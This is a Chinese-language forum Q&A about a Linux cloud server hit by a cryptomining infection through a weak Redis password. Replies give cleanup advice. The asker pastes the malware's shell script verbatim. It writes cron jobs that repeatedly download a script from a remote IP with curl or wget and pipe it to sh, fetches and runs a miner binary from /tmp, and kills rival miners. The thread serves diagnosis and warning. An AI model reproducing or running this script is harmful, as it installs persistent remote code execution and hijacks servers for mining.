【linux】linux cpu占用异常,多次登录失败记录,请大佬分析一下
最近突然发现一个阿里云服务器cpu占用异常,而且短时间内有多次登录失败记录;请问有人了解吗?
几分钟没有登录就已经有三百多次失败记录
使用top查看发现该进程
该进程的运行文件是一个在/tmp/文件夹下的qW3xT可执行文件
查看进程树如下
回答
crontab -l查看一下任务
有任务的话 杀死 看看脚本文件位置 删除
遇到过,关闭定时任务,修改reids密码,重启一下就可以了,应该是挖矿的
谢谢两位大佬,确实是个挖矿脚本,被设置了定时任务,经验不足。
应该是redis密码太弱,被扫到了,希望大家设置redis不要使用简单密码,执行脚本我下下来了
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
供参考
另外发现在reids被利用之后,有一个ip每几分钟就会尝试登录服务器,持续到现在
我的服务器今天也是被这个挖坑的程序一直占用cpu 99%
不知道redis最好不要开端口吗?要开也不能开默认端口啊
以上是 【linux】linux cpu占用异常,多次登录失败记录,请大佬分析一下 的全部内容, 来源链接: utcz.com/a/84483.html
